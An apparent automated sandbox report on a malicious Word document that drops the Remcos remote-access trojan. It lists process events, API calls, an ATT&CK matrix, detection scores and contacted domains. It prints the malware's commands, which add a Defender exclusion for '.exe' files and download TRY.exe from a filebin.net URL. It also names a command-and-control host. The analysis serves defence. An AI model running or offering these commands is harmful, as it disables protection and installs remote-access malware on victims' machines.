Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\msiexec.exe TID: 2400	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 3633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 5106 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076	Thread sleep count: 2122 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 3302 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016	Thread sleep count: 68 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5208	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5106
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3302

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC45E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError,

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC47F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC47C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC412C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC48114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC429E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	21 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	21 Scripting	OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	3 Exploitation for Client Execution	1 Services File Permissions Weakness	11 Process Injection	1 File Deletion	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	21 Masquerading	NTDS	17 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Services File Permissions Weakness	21 Virtualization/Sandbox Evasion	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
12543_0008858249_FWDOUTSTANDING_20200604.doc	38%	Virustotal		Browse
12543_0008858249_FWDOUTSTANDING_20200604.doc	24%	ReversingLabs	Win32.Downloader.Mutisedow
12543_0008858249_FWDOUTSTANDING_20200604.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	100%	Avira	HEUR/AGEN.1213068
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	100%	Joe Sandbox ML
C:\Windows\Installer\MSI1064.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSI1064.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI847A.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSI847A.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIFECD.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSIFECD.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
filebin.net	5%	Virustotal		Browse
situla.bitbit.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	5%	Virustotal		Browse
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	100%	Avira URL Cloud	malware
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	100%	Avira URL Cloud	malware
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	100%	Avira URL Cloud	malware
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/$	100%	Avira URL Cloud	malware
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/	100%	Avira URL Cloud	malware
https://wus2.contentsync.	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	100%	Avira URL Cloud	malware
bambam.hopto.org	0%	Avira URL Cloud	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
filebin.net	185.47.40.36	true	true	5%, Virustotal, Browse	unknown
situla.bitbit.net	87.238.33.8	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	true	Avira URL Cloud: malware	unknown
bambam.hopto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.microsoftonline.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://shell.suite.office.com:1443	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://autodiscover-s.outlook.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://roaming.edog.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cdn.entity.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://powerlift.acompli.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cortana.ai	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.aadrm.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.microsoftstream.com/api/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cr.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	Avira URL Cloud: safe	low
